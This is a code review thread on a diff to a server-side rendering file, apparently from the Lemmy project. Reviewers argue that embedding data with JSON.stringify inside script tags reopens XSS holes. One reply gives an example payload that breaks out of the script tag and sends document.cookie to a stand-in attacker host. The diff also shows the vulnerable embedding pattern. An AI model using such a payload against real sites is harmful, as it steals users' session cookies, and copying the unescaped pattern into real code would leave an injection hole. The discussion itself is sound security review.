src/server/utils/create-ssr-html.tsx

```diff
@@ -59,8 +58,12 @@ export async function createSsrHtml(
     <!DOCTYPE html>
     <html ${helmet.htmlAttributes.toString()}>
     <head>
-    <script>window.isoData = ${serialize(isoData)}</script>
-    <script>window.lemmyConfig = ${serialize(config)}</script>
+    <script type="application/json" id="isoData">${JSON.stringify(
+      isoData
```

Comment:
Going back to stringify will allow all the old XSS vulns.

Reply:
To clarify `JSON.stringify` is not sufficient for encoding arbitrary JSON data into HTML. Most notably something like this:

```
{"foo":"</script><script>fetch(`https://evil.example/${document.cookie}`)</script>"}
```

We should not be doing adhoc embedding of data into HTML. We should be using proper serialization.

Reply:
It shouldn't allow other XSS because of the CSP header but otherwise you're right. I think the best way to do proper serialization then would be to use `renderToString(<script>{JSON.stringify(...)</script>)` from inferno then though? Since that must already have correct escaping